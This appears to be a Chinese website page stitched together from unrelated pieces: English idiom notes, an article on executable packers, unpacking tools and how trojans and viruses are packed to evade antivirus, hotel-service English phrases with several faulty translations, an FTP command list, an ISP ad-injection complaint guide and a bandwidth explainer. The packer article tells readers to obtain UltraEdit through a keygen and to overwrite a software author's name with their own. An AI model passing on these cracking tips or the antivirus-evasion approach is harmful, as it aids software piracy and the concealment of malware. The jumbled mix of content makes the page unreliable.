维克苗综合站

He earned his bread by writing novels. 
他靠写小说维生。 

————————————————————————————————— 
earn one’s bread (or living):  谋生活 
例句：I earn my daily bread by working in a supermarket. 我在超级市场工作以维持生计。 

She gave him a box on his ears. 
她打了他一耳光。 

————————————————————————————————— 
give sb. a box on the ear:  打某人一耳光 

壳是什么？脱壳又是什么？这是很多经常感到迷惑和经常提出的问题，其实这个问题一点也不幼稚。当你想听说脱壳这个名词并试着去了解的时候，说明你已经在各个安全站点很有了一段日子了。下面，我们进入“壳”的世界吧。 
一、金蝉脱壳的故事 
我先想讲个故事吧。那就是金蝉脱壳。金蝉脱壳属于三十六计中的混战计。金蝉脱壳的本意是：寒蝉在蜕变时，本体脱离皮壳而走，只留下蝉蜕还挂在枝头。此计用于军事，是指通过伪装摆脱敌人，撤退或转移，以实现我方的战略目标的谋略。稳住对方，撤退或转移，决不是惊慌失措，消极逃跑，而是保留形式，抽走内容，稳住对方，使自己脱离险境达到己方战略目标，己方常常可用巧妙分兵转移的机会出击另一部分敌人。三国时期，诸葛亮六出祁山，北伐中原，但一直未能成功，终于在第六次北伐时，积劳成疾，在五丈原病死于军中。 维遵照诸葛亮的吩咐，在诸葛亮死后，秘不发丧，对外严密封锁消息。他带着灵柩，秘密率部撤退。司马懿派部队跟踪追击蜀军。姜维命工匠仿诸葛亮摸样，雕了一个木人，羽扇纶巾，稳坐车中。并派杨仪率领部分人马大张旗鼓，向魏军发动进攻。魏军远望蜀军，军容整齐，旗鼓大张，又见诸葛亮稳坐车中，指挥若定，不知蜀军又耍什么花招，不敢轻举妄动。司马懿一向知道诸葛亮“诡计多端”，又怀疑此次退兵乃是诱敌之计，于是命令部队后撤，观察蜀军动向。姜维趁司马懿退兵的大好时机，马上指挥主力部队，迅速安全转移，撤回汉中。等司马懿得知诸葛亮已死，再进兵追击，为时已晚。相信这个故事，大家在大型连续剧《三国演义》里已经看过了。呵呵，只是没有理解得这么深入罢了！而在黑客入侵技术中，金蝉脱壳则是指：删除系统运行日志 攻击者攻破系统后，常删除系统运行日志，隐藏自己的痕迹…呵呵 
二、壳，脱壳，加壳 
在自然界中，我想大家对壳这东西应该都不会陌生了，由上述故事，我们也可见一斑。自然界中植物用它来保护种子，动物用它来保护身体等等。同样，在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行，拿到控制权，然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然（但后来也出现了所谓的“壳中带籽”的壳）。由于这段程序和自然界的壳在功能上有很多相同的地方，基于命名的规则，大家就把这样的程序称为“壳”了。就像计算机病毒和自然界的病毒一样，其实都是命名上的方法罢了。 从功能上抽象，软件的壳和自然界中的壳相差无几。无非是保护、隐蔽壳内的东西。而从技术的角度出发，壳是一段执行于原始程序前的代码。原始程序的代码在加壳的过程中可能被压缩、加密……。当加壳后的文件执行时，壳－这段代码先于原始程序运行，他把压缩、加密后的代码还原成原始程序代码，然后再把执行权交还给原始代码。 软件的壳分为加密壳、压缩壳、伪装壳、多层壳等类，目的都是为了隐藏程序真正的OEP（入口点，防止被破解）。关于“壳”以及相关软件的发展历史请参阅吴先生的《一切从“壳”开始》。 
（一）壳的概念 
作者编好软件后，编译成exe可执行文件。 1.有一些版权信息需要保护起来，不想让别人随便改动，如作者的姓名，即为了保护软件不被破解，通常都是采用加壳来进行保护。 2.需要把程序搞的小一点，从而方便使用。于是，需要用到一些软件，它们能将exe可执行文件压缩， 3.在黑客界给木马等软件加壳脱壳以躲避杀毒软件。实现上述功能，这些软件称为加壳软件。 
（二）加壳软件最常见的加壳软件 
ASPACK ，UPX，PEcompact 不常用的加壳软件WWPACK32；PE-PACK ；PETITE NEOLITE 
（三）侦测壳和软件所用编写语言的软件 
因为脱壳之前要查他的壳的类型。 
1.侦测壳的软件fileinfo.exe 简称fi.exe（侦测壳的能力极强）。 
2.侦测壳和软件所用编写语言的软件language.exe（两个功能合为一体，很棒），推荐language2000中文版（专门检测加壳类型）。 
3.软件常用编写语言Delphi，VisualBasic（VB）—最难破，VisualC（VC）。 
（四）脱壳软件 
软件加壳是作者写完软件后，为了保护自己的代码或维护软件产权等利益所常用到的手段。目前有很多加壳工具，当然有盾，自然就有矛，只要我们收集全常用脱壳工具，那就不怕他加壳了。软件脱壳有手动脱和自动脱壳之分，下面我们先介绍自动脱壳，因为手动脱壳需要运用汇编语言，要跟踪断点等，不适合初学者，但我们在后边将稍作介绍。 
加壳一般属于软件加密，现在越来越多的软件经过压缩处理，给汉化带来许多不便，软件汉化爱好者也不得不学习掌握这种技能。现在脱壳一般分手动和自动两种，手动就是用TRW2000、TR、SOFTICE等调试工具对付，对脱壳者有一定水平要求，涉及到很多汇编语言和软件调试方面的知识。而自动就是用专门的脱壳工具来脱，最常用某种压缩软件都有他人写的反压缩工具对应，有些压缩工具自身能解压，如UPX；有些不提供这功能，如：ASPACK，就需要UNASPACK对付，好处是简单，缺点是版本更新了就没用了。另外脱壳就是用专门的脱壳工具来对付，最流行的是PROCDUMP v1.62 ，可对付目前各种压缩软件的压缩档。在这里介绍的是一些通用的方法和工具，希望对大家有帮助。我们知道文件的加密方式，就可以使用不同的工具、不同的方法进行脱壳。下面是我们常常会碰到的加壳方式及简单的脱壳措施，供大家参考： 脱壳的基本原则就是单步跟踪，只能往前，不能往后。脱壳的一般流程是：查壳->寻找OEP->Dump->修复 找OEP的一般思路如下： 先看壳是加密壳还是压缩壳，压缩壳相对来说容易些，一般是没有异常，找到对应的popad后就能到入口，跳到入口的方式一般为。 我们知道文件被一些压缩加壳软件加密，下一步我们就要分析加密软件的名称、版本。因为不同软件甚至不同版本加的壳，脱壳处理的方法都不相同。 
常用脱壳工具： 
1、文件分析工具（侦测壳的类型）：Fi，GetTyp，peid，pe-scan， 
2、OEP入口查找工具：SoftICE，TRW，ollydbg，loader，peid 
3、dump工具：IceDump，TRW，PEditor，ProcDump32，LordPE 
4、PE文件编辑工具PEditor，ProcDump32，LordPE 
5、重建Import Table工具：ImportREC，ReVirgin 
6、ASProtect脱壳专用工具：Caspr（ASPr V1.1-V1.2有效），Rad（只对ASPr V1.1有效），loader，peid 
（1）Aspack： 用的最多，但只要用UNASPACK或PEDUMP32脱壳就行了 
（2）ASProtect+aspack：次之，国外的软件多用它加壳，脱壳时需要用到SOFTICE+ICEDUMP，需要一定的专业知识，但最新版现在暂时没有办法。 
（3）Upx： 可以用UPX本身来脱壳，但要注意版本是否一致，用-D 参数 
（4）Armadill： 可以用SOFTICE+ICEDUMP脱壳，比较烦 
（5）Dbpe： 国内比较好的加密软件，新版本暂时不能脱，但可以破解 
（6）NeoLite： 可以用自己来脱壳 
（7）Pcguard： 可以用SOFTICE+ICEDUMP+FROGICE来脱壳 
（8）Pecompat： 用SOFTICE配合PEDUMP32来脱壳，但不要专业知识 
（9）Petite： 有一部分的老版本可以用PEDUMP32直接脱壳，新版本脱壳时需要用到SOFTICE+ICEDUMP，需要一定的专业知识 
（10）WWpack32： 和PECOMPACT一样其实有一部分的老版本可以用PEDUMP32直接脱壳，不过有时候资源无法修改，也就无法汉化，所以最好还是用SOFTICE配合 PEDUMP32脱壳　　 
我们通常都会使用Procdump32这个通用脱壳软件，它是一个强大的脱壳软件，他可以解开绝大部分的加密外壳，还有脚本功能可以使用脚本轻松解开特定外壳的加密文件。另外很多时候我们要用到exe可执行文件编辑软件ultraedit。我们可以下载它的汉化注册版本，它的注册机可从网上搜到。ultraedit打开一个中文软件，若加壳，许多汉字不能被认出 ultraedit打开一个中文软件，若未加壳或已经脱壳，许多汉字能被认出 ultraedit可用来检验壳是否脱掉，以后它的用处还很多，请熟练掌握例如，可用它的替换功能替换作者的姓名为你的姓名注意字节必须相等，两个汉字替两个，三个替三个，不足处在ultraedit编辑器左边用00补。 
常见的壳脱法： 
（一）aspack壳 脱壳可用unaspack或caspr 1.unaspack ，使用方法类似lanuage，傻瓜式软件，运行后选取待脱壳的软件即可. 缺点：只能脱aspack早些时候版本的壳，不能脱高版本的壳 2.caspr第一种：待脱壳的软件（如aa.exe）和caspr.exe位于同一目录下，执行windows起始菜单的运行，键入 caspr aa.exe脱壳后的文件为aa.ex_，删掉原来的aa.exe，将aa.ex_改名为aa.exe即可。使用方法类似fi 优点：可以脱aspack任何版本的壳，脱壳能力极强缺点：Dos界面。第二种：将aa.exe的图标拖到caspr.exe的图标上***若已侦测出是aspack壳，用unaspack脱壳出错，说明是aspack高版本的壳，用caspr脱即可。 
（二）upx壳 脱壳可用upx待脱壳的软件（如aa.exe）和upx.exe位于同一目录下，执行windows起始菜单的运行，键入upx -d aa.exe。 
（三）PEcompact壳 脱壳用unpecompact 使用方法类似lanuage傻瓜式软件，运行后选取待脱壳的软件即可。 
（四）procdump 万能脱壳但不精，一般不要用 使用方法：运行后，先指定壳的名称，再选定欲脱壳软件，确定即可脱壳后的文件大于原文件由于脱壳软件很成熟，手动脱壳一般用不到。 
三、压缩与脱壳 
现在脱壳一般分手动和自动两种，手动就是用TRW2000、TR、SOFTICE等调试工具对付，对脱壳者有一定水平要求。而自动就稍好些，用专门的脱壳工具来脱，最常用某种压缩软件都有他人写的反压缩工具对应，有些压缩工具自身能解压，如UPX；有些不提供这功能，如：ASPACK，就需要UNASPACK对付。很多文件使用了一些压缩加壳软件加密过，这就需要对文件进行解压脱壳处理后，才能汉化。这种压缩与我们平时接触的压缩工具如winzip，winrar等压缩不同，winzip和winrar等压缩后的文件不能直接执行，而这种 EXE 压缩软件，EXE文件压缩后，仍可以运行。这种压缩工具把文件压缩后，会在文件开头一部分，加了一段解压代码。执行时该文件时，该代码先执行解压还原文件，不过这些都是在内存中完成的，由于微机速度快，我们基本感觉不出有什么不同。这样的程序很多，如 The bat，Acdsee，Winxfile等等。 
要脱壳就应先了解常用压缩工具有哪些，这样知己知彼，如今越来越多的软件商喜欢用压缩方式发行自己的产品，如The bat！用UPX压缩，ACDSEE3.0用ASPACK压缩等。 
它有以下因素： 
一是：微机性能越来越好，执行过程中解压使人感觉不出来，用户能接受（给软件加壳，类似WINZIP 的效果，只不过这个加壳压缩之后的文件，可以独立运行，解压过程完全隐蔽，都在内存中完成。解压原理，是加壳工具在文件头里加了一段指令，告诉CPU，怎么才能解压自己。现在的CPU都很快，所以这个解压过程你看不出什么异常。因为软件一下子就打开了，只有你机器配置非常差，才会感觉到不加壳和加壳后的软件运行速度的差别。）。　 
二是：压缩后软件体积缩小，便于网络传输。 
三是：增加破解的难度。首先，加壳软件不同于一般的winzip，winrar等压缩软件.它是压缩exe可执行文件的，压缩后的文件可以直接运行.而winzip，winrar等压缩软件可压缩任何文件，但压缩后不能直接运行。很多站点不允许上传可执行文件，而只能上传压缩的文件，一方面处于速度考虑，也是为了安全性考虑。用加壳软件压缩的文件就是体积缩小，别的性质没改变。还是EXE文件，仍可执行，只是运行过程和以前不一样了。压缩工具把文件压缩后，在文件开头一部分，加了一段解压代码。执行时该文件时，该代码先执行解压还原文件，不过这些都是在内存中完成的，由于微机速度快，我们基本感觉不出有什么不同。 
四p加壳与木马 
木马危害无穷，但是随着人们对各种木马知识的了解，杀毒和专杀工具的特殊照顾，使得很多木马无藏身之地，但很多高手到处卖马，号称不会被查杀。它们究竟是如何躲在我们的系统中的呢？ 其实无非对木马进行“加/脱壳”。对于黑客来说，加/脱壳技术被淋漓尽致地应用到了伪装木马客户端上，目的是为了防止被杀毒软件反跟踪查杀和被跟踪调试，同时也防止算法程序被别人静态分析。最基本的隐藏：不可见窗体＋隐藏文件。木马程序 
采用“进程隐藏”技术： 第一代进程隐藏技术：Windows 98的后门 。第二代进程隐藏技术：进程插入，以及 其后的Hook技术之外就是跟杀毒软件对着干：反杀毒软件外壳技术了。木马再狡猾，可是一旦被杀毒软件定义了特征码，在运行前就被拦截了。要躲过杀毒软件的追杀，很多木马就被加了壳，相当于给木马穿了件衣服，这样杀毒软件就认不出来了，但有部分杀毒软件会尝试对常用壳进行脱壳，然后再查杀（小样，别以为穿上件马夹我就不认识你了）。除了被动的隐藏外，最近还发现了能够主动和杀毒软件对着干的壳，木马在加了这种壳之后，一旦运行，则外壳先得到程序控制权，由其通过各种手段对系统中安装的杀毒软件进行破坏，最后在确认安全（杀毒软件的保护已被瓦解）后由壳释放包裹在自己“体内”的木马体并执行之。对付这种木马的方法是使用具有脱壳能力的杀毒软件对系统进行保护。壳能够将文件（比如EXE）包住，然后在文件被运行时，首先由壳获得控制权，然后释放并运行包裹着的文件体。很多壳能对自己包住的文件体进行加密，这样就可以防止杀毒软件的查杀。比如原先杀毒软件定义的该木马的特征是“12345”，如果发现某文件中含有这个特征，就认为该文件是木马，而带有加密功能的壳则会对文件体进行加密（如：原先的特征是“12345”，加密后变成了“54321”，这样杀毒软件当然不能靠文件特征进行检查了）。脱壳指的就是将文件外边的壳去除，恢复文件没有加壳前的状态。 
虽然很多杀毒软件的文件监控都会使程序首次运行时速度很慢。这是因为：杀毒软件对压缩加壳的exe文件监控扫描时，都要先“脱壳”。一般压缩加壳程序，可加密压缩可执行文件的代码、数据、输入表、重定位表、资源段。通常压缩后的文件大小只有原来的50%-70%，但不影响程序的正常使用和所有功能，目的是保护文件不被跟踪分析，反汇编，脱壳等。所以有时候使用某软件给木马脱壳会失败，但可换个软件试下。脱壳后重新加壳或者使用不同加壳的软件给木马加多层壳，均有可能欺骗杀毒软件，但在经过复杂的多重加壳后，检测出的结果就不一定准确了，此时就需要“adv.scan”高级扫描， pe-scan会分析出被各种加壳工具加壳的可能性。 
五p加壳与病毒 
病毒要想生存，除了增加自身的变形能力以外，还可与程序加壳压缩联系起来。我们先来看看病毒变形的目的，因为现在的反病毒软件，基于特征码检测，增加变形能力，使得特征码检测方法更加困难。那么，如果再和程序加壳技术结合起来，那么将使的单单通过添加特征码方法解毒彻底失效，解毒时，必须同时更新扫描引擎，而现在并没有通用的解壳方法。因此加壳压缩和变形结合起来，将使得反病毒厂商手忙脚乱，也使得反病毒软件用户痛苦不堪，频繁的更新，除了特征码，还有扫描引擎。给平常的病毒加个壳，比如用upx，现在通常反病毒软件，对于常用的加密加壳压缩程序，都有相应的解壳程序。效果并不好，所以如果病毒本是既是一好的变形加密加壳压缩程序，那么，目的是强迫更新扫描引擎，当然也是可以被动态解压检测出来的，只是增加了解毒的很多工作量。实际上加壳技术不仅仅用于软件保护，也可用于好的病毒。好的病毒不一定要非常快的传播速度，难于检测，难于查杀更重要一些，就像现在杀毒界的虚拟机技术，也不过是个雏形，有很多的功能并不能完全虚拟化，同时若加壳代码本身可变形，同时有多种加壳算法可供随机选择，那么就很难找出其中的规律以及关系。总之，好的杀毒软件至少应该具有的技术功能之一就是要具备压缩还原技术：对Pklite、Diet、Exepack、Com2exe、Lzexe、Cpav等几百种压缩加壳软件自动还原，彻底解除隐藏较深的病毒，避免病毒死灰复燃。
来源：赛迪

1：祝您住店愉快Enjoy your stay. 
2：您先请 You first, please! 
3：313房间的坐便器不能使用了，请处理一下好吗？The water closet in No. 313 room is wrong, can you repair it? 
4：节日快乐 Happy Holidays 
5：祝您生意兴隆Every success in your business! 
6：您的事我马上就办 I will do what you told soon! 
7：还有别的事吗 Anything else? 
8：照顾不周的地方，请多多指教Insufficient care, please indicate! 
9：欢迎批评，指教All comments and suggestions are very welcome 
10：先生，请原谅 Pardon me ,Sir 
11：我马上着手处理 I will treat it soon! 
12：请不要介意 Never mind! 
13：请原谅，这是我的疏忽 Pardon, my carelessness 
14：请稍等，我马上去办 Please wait a moment, I will do it! 
15：请原谅我来晚了 Please pardon me for I come here later! 
16：很抱歉我太大意了 Sorry, I was too reckless! 
17：非常乐意随时为您效劳I am at your service at any moment! 
18：谢谢您送给我如此别致的礼物 Thank you for sending so delicate present to me! 
19：没关系，我们做得还不够好 It doesn’t matter, we have done inadequately! 
20：先生，请往前面走 Sir, please go ahead! 
21：小姐，请一直往前走 Ms. please go straight ahead! 
22：到第一个转弯处请向左拐弯走 Turn left when you at the first corner. 
23：请在这里下去到大堂 Go to the hall here 
24：请问这是你的行李吗？ Please tell me is this your luggage? 
25：请不要进来，稍后 Please do not come in, just wait a moment! 
26:请您按这个地址将邮件寄给我 Please post it to me according to the address. 
27：请问开关在哪里 where is the switch? 
28:我想结帐 I want check-out! 
29：这是您的发票 Your invoice here 
30：太太/先生，请这边走。Mrs/Mr. Here please! 
31:先生，请一直往前走。Mr. please go straight ahead! 
32：希望能再见到你。Wish to see you next time! 
33：一路平安Happy landing! 
34：祝你好运，万事如意Good luck and much happiness!” 
35：大堂24小时有大堂副理值班为您服务 The assistant manager in the hall services for you all day and all night. 
36:如果需要行李员为您服务的话，请拨3与大堂的大厅服务处联系 For luggage service, please dial “3” to contact with the servicing place in the hall. 
37：美容室在地下室，请打电话8，上午8点至晚间8点营业。 The hairdressing room is in the basement, please dial “8”, which goes on business from 8 am. to 8 pm.. 
38:结帐处在大厅The check-out counter is in the hall. 
39：打电话4与商务中心联系特快专递服务。 Please dial “4” to contact with the commercial center for ordering Express Mail Service(EMS) 
40:房内电话机的灯亮时，表明有您的留言，请拨9于总机联系。The lighting of the phone-indicator indicates that you have leave word, please dial “9” to contact with the telephone exchange. 
41:切勿将钥匙挂在门上。出店或退房时，清将钥匙交给询问处。Please do not hang the keys on the door. When you leave or check out, please hand in the keys to the enquiring place. 
42：如果您要擦鞋的话，请与客房中心联系。For cleaning shoes, please contact with the service center. 
43：小件行李短期寄存请与“3”与大厅服务处联系。Please dial “3” to contact with the servicing place in the hall for short-term consignation of small luggage. 
44：请拨“9”与总机联系叫醒服务。Please dial “9” to contact with the telephone exchange for ordering waking up service. 
45：茶座供应各种菜点及各种饮料，每天的营业时候为上午8点30分至11点。The tea bar provides various cuisines and beverages, goes on business from 8:30 am to 11 am. 
46：如果您要租借物品，请拨“5”与客房中心联系。Please dial “5” to contact with the servicing center for leasing. 
47：中餐厅供应中式早、午、晚餐，备有淮扬菜和粤菜。 Chinese meal hall provides with Chinese-styled breakfast, lunch, and super, both Huaiyang cuisine and Guangdong cuisine are provided here. 
48：我们拥有十多间小型会议厅。 We have more than ten small-scaled meeting hall. 
49:如果您要按摩的话，请拨“316”与 桑拿中心联系。Please dial “316” to contact with the Sona center for massage. 
50：客人不得携带动物或其他宠物进入饭店。 Do not enter into the hotel carrying animals or other pets. 
51：模拟高尔夫靠近室内游泳池。 The simulated Golf is near to swimming bath. 
52：保龄球馆在一楼，营业时间是上午10点至凌晨2点。 Bowling alley is in the first floor, goes on business from 10:00 am to 2:00 am of the next morning. 
53：欢迎您来八楼，我是楼层服务员。有事尽管吩咐。Welcome to the 8th floor, I am the flat waitress. Anything please behest me. 
54:对不起，请问您有衣服要洗吗？Sorry, have you some clothes to clean?

FTP命令是Internet用户使用最频繁的命令之一，不论是在DOS还是UNIX操作系统下使用FTP，都会遇到大量的FTP内部命令。熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。
　　FTP的命令行格式为：ftp -v -d -i -n -g [主机名]，其中
　　-v显示远程服务器的所有响应信息；
　　-n限制ftp的自动登录，即不使用；
　　.n etrc文件；
　　-d使用调试方式；
　　-g取消全局文件名。
　　ftp使用的内部命令如下(中括号表示可选项): 
　　1.![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip. 
　　2.$ macro-ame[args]：执行宏定义macro-name. 
　　3.account[password]：提供登录远程系统成功后访问系统资源所需的补充口令。
　　4.append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。
　　5.ascii：使用ascii类型传输方式。
　　6.bell：每个命令执行完毕后计算机响铃一次。
　　7.bin：使用二进制文件传输方式。
　　8.bye：退出ftp会话过程。
　　9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。
　　10.cd remote-dir：进入远程主机目录。
　　11.cdup：进入远程主机目录的父目录。
　　12.chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a.out。
　　13.close：中断与远程服务器的ftp会话(与open对应)。
　　14.cr：使用asscii方式传输文件时，将回车换行转换为回行。
　　15.delete remote-file：删除远程主机文件。
　　16.debug[debug-value]：设置调试方式，显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。
　　17.dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件local-file。
　　18.disconnection：同close。
　　19.form format：将文件传输方式设置为format，缺省为file方式。
　　20.get remote-file[local-file]：将远程主机的文件remote-file传至本地硬盘的local-file。
　　21.glob：设置mdelete，mget，mput的文件名扩展，缺省时不扩展文件名，同命令行的-g参数。
　　22.hash：每传输1024字节，显示一个hash符号(#)。
　　23.help[cmd]：显示ftp内部命令cmd的帮助信息，如：help get。
　　24.idle[seconds]：将远程服务器的休眠计时器设为[seconds]秒。
　　25.image：设置二进制传输方式(同binary)。
　　26.lcd[dir]：将本地工作目录切换至dir。
　　27.ls[remote-dir][local-file]：显示远程目录remote-dir，并存入本地文件local-file。
　　28.macdef macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。
　　29.mdelete[remote-file]：删除远程主机文件。
　　30.mdir remote-files local-file：与dir类似，但可指定多个远程文件，如：mdir *.o.*.zipoutfile
　　31.mget remote-files：传输多个远程文件。
　　32.mkdir dir-name：在远程主机中建一目录。
　　33.mls remote-file local-file：同nlist，但可指定多个文件名。
　　34.mode[modename]：将文件传输方式设置为modename，缺省为stream方式。
　　35.modtime file-name：显示远程主机文件的最后修改时间。
　　36.mput local-file：将多个文件传输至远程主机。
　　37.newer file-name：如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。
　　38.nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的local-file。
　　39.nmap[inpattern outpattern]：设置文件名映射机制，使得文件传输时，文件中的某些字符相互转换，如：nmap $1.$2.$3[$1，$2].[$2，$3]，则传输文件a1.a2.a3时，文件名变为a1，a2。该命令特别适用于远程主机为非UNIX机的情况。
　　40.ntrans[inchars[outchars]]：设置文件名字符的翻译机制，如ntrans 1R，则文件名LLL将变为RRR。
　　41.open host[port]：建立指定ftp服务器连接，可指定连接端口。
　　42.passive：进入被动传输方式。
　　43.prompt：设置多个文件传输时的交互提示。
　　44.proxy ftp-cmd：在次要控制连接中，执行一条ftp命令，该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。
　　45.put local-file[remote-file]：将本地文件local-file传送至远程主机。
　　46.pwd：显示远程主机的当前工作目录。
　　47.quit：同bye，退出ftp会话。
　　48.quote arg1，arg2…：将参数逐字发至远程ftp服务器，如：quote syst. 
　　49.recv remote-file[local-file]：同get。
　　50.reget remote-file[local-file]：类似于get，但若local-file存在，则从上次传输中断处续传。
　　51.rhelp[cmd-name]：请求获得远程主机的帮助。
　　52.rstatus[file-name]：若未指定文件名，则显示远程主机的状态，否则显示文件状态。
　　53.rename[from][to]：更改远程主机文件名。
　　54.reset：清除回答队列。
　　55.restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。
　　56.rmdir dir-name：删除远程主机目录。
　　57.runique：设置文件名唯一性存储，若文件存在，则在原文件后加后缀..1，.2等。
　　58.send local-file[remote-file]：同put。
　　59.sendport：设置PORT命令的使用。
　　60.site arg1，arg2…：将参数作为SITE命令逐字发送至远程ftp主机。
　　61.size file-name：显示远程主机文件大小，如：site idle 7200。
　　62.status：显示当前ftp状态。
　　63.struct[struct-name]：将文件传输结构设置为struct-name，缺省时使用stream结构。
　　64.sunique：将远程主机文件名存储设置为唯一(与runique对应)。
　　65.system：显示远程主机的操作系统类型。
　　66.tenex：将文件传输类型设置为TENEX机的所需的类型。
　　67.tick：设置传输时的字节计数器。
　　68.trace：设置包跟踪。
　　69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如：type binary，设置二进制传输方式。
　　70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3。
　　71.user user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous my@email。
　　72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp服务器的所有响应都将显示给用户，缺省为on. 
　　73.?[cmd]：同help。 

——————————————————————
公告栏
———————————
留言板
———————————
看广告玩游戏送QQ币

It’s bound to rain soon. 
过一会儿肯定会下雨。 

————————————————————————————————— 
bound to:  vt. 必然(不得不,必须,束缚于)， 
例句： 
I am bound to say I disagree with you on this point. 我必须声明不同意你这一点。 
You are not legally bound to answer these questions. 在法律上，你没有义务非回答这些问题。 

今天给我的MT800设置了ＮＡＴ，加了PCANYWHERE 的两个端口,重启电脑后就弹出互联星空的广告，找到了以下解决办法。以后受不了了再用。
—————-
对于中国电信ADSL的Push流氓广告业务，我去年开始注意到这个弹出广告现象，也进行过不少报道，中国电信通过这种所谓的“ADSL推送式广告”，强行修改和劫持了用户的HTTP会话，在用户访问的网页强行弹出电信的广告，可惜的是过了这么长时间，我们依旧没有很好的技术手段来屏蔽这种强行弹出式广告，直到最近我发现这种HTTP劫持已经发展到了直接篡改网站内容的可怕境界，这实在是让人忍无可忍了。
　　今天看到cnBeta有人投递了一个很有新意的解决方案，是去向电信的客服进行投诉，可以让电信将ADSL帐号从广告中排除，具体步骤如下：
　　1.电话10000，讲解有广告，明确告诉客服，我是投诉“增值业务部门”增加的强行广告；特别要强调是投诉增值业务部门，特别告诉他们不要转到ADSL运营部门去了。
　　2.投诉电信PUSH业务。这个业务叫PUSH 强推广告业务，电信增值业务部门正在招标和测试。所以特别要强调，请把我的adsl帐号用测试名单中去掉。特别强调从push 广告业务测试中去掉自己。
　　3.多次要求投诉增值业务部门，告知该强行广告是强插到他人网站了。如果客服搪塞说是网站广告，请严厉的告诉电信客服，我自己的网站也被强行插入广告了！
　　4.多打几次，我前后打了7次之多，成功排除了我家和公司的强插广告。
　　5.每次注意记下客服人员编号。
　　6.该PUSH业务本身具有过滤用户功能，且记录了adsl用户的用户名等信息的，可以过滤不对某用户插入广告。我们下一步目标恐怕要是抵制不法厂商推出这种解决方案给电信单位。
　　如果这个消息属实的话，那么我们电信ADSL用户的出头之日终于就要到了，因为弹出广告是和帐号绑定，那么我们就可以要求电信解除这样的广告绑定，为了验证这个消息是否可行，我建议所有受到电信PUSH广告骚扰的电信ADSL用户，一起去打电信10000服务电话，按照上面的步骤，看看能否成功取消这样的PUSH流氓广告，如果用户对这样的广告反应强烈的话，我估计电信会逐步放弃这样的流氓广告方式。

上行速率是指用户电脑向网络发送信息时的数据传输速率，下行速率是指网络向用户电脑发送信息时的传输速率。比如用FTP上传文件到网上去，影响上传速度的就是“上行速率”；而从网上下载文件，影响下载速度的就是“下行速率”。当然，在实际上传下载过程中，线路、设备(含计算机及其他设备)等的质量也会对速度造成或多或少的影响。 
———–
宽带网速计算方法 
基础知识： 
在计算机科学中，bit是表示信息的最小单位，叫做二进制位；一般用0和1表示。Byte叫做字节，由8个位（8bit）组成一个字节(1Byte)，用于表示计算机中的一个字符。bit与Byte之间可以进行换算，其换算关系为：1Byte=8bit（或简写为：1B=8b）；在实际应用中一般用简称，即1bit简写为1b(注意是小写英文字母b)，1Byte简写为1B（注意是大写英文字母B）。 
在计算机网络或者是网络运营商中，一般，宽带速率的单位用bps(或b/s)表示；bps表示比特每秒即表示每秒钟传输多少位信息，是bit per second的缩写。在实际所说的1M带宽的意思是1Mbps（是兆比特每秒Mbps不是兆字节每秒MBps）。 
建议用户记住以下换算公式： 
1B=8b 1B/s=8b/s(或1Bps=8bps) 
1KB=1024B 1KB/s=1024B/s 
1MB=1024KB 1MB/s=1024KB/s 
规范提示：实际书写规范中B应表示Byte(字节)，b应表示bit(比特)，但在平时的实际书写中有的把bit和Byte都混写为b ，如把Mb/s和MB/s都混写为Mb/s，导致人们在实际计算中因单位的混淆而出错。切记注意！！！ 
实例： 在我们实际上网应用中，下载软件时常常看到诸如下载速度显示为128KBps（KB/s），103KB/s等等宽带速率大小字样，因为ISP提供的线路带宽使用的单位是比特，而一般下载软件显示的是字节（1字节＝8比特），所以要通过换算，才能得实际值。然而我们可以按照换算公式换算一下： 
128KB/s=128×8(Kb/s)=1024Kb/s=1Mb/s即128KB/s=1Mb/s。 

案例1： 某用户反映，为什么我的网速和我办的带宽不一样？ 我办的是4M 的宽带,可为什么我测试却只有2百多K的网速啊? 是不是电信骗了我？没有给我开4M哟 ? 
案例分析：尊敬的用户，这只是误会。这可能有几个你不理解的原因：第一，实际网速单位是Mb/s，不是MB/s，而你所说的2百多K，其实际是指2百多KB/s（即2百多千字节每秒）不是2百多Kb/s（即2百多千比特每秒），通常情况下都是说简称如250KB/s或250Kb/s说成250K。第二，宽带4Mb/s=512KB/s并且这只是技术上的最大理论值，而不是所达到的实际值，一般正常情况下技术上的最大理论值为4Mb/s的宽带实际值可以达200KB/s至440KB/s。因为宽带速率要受到很多因素（比如用户计算机性能、资源使用情况、网络高峰期、网站服务能力、信号衰耗、线路衰耗、距离远近等）的影响，所以导至实际值与技术上的最大理论值有偏差。第三，网络运营商提供的宽带速率单位中，”bps”是指”bit per second”。而实际速度所指的bps是指”Byte per second”。所以要经过换算，而1Byte=8bit，在计算网速的上行速度或下行速度，都必须将数值除以8即把bit转化为Byte。例如：下行速度（即下载速度）为1Mb/s，其换算成等价值就是128KBps ；换算方法:1Mbps=1024/8（KBps）=128KBps即128KByte/s 。 
案例2： 某用户反映， 我办的是4M 的宽带, 为什么我的网速比通常情况下都慢哟，而且还经常掉线？是不是电信骗了我？没有给我开4M哟 ? 
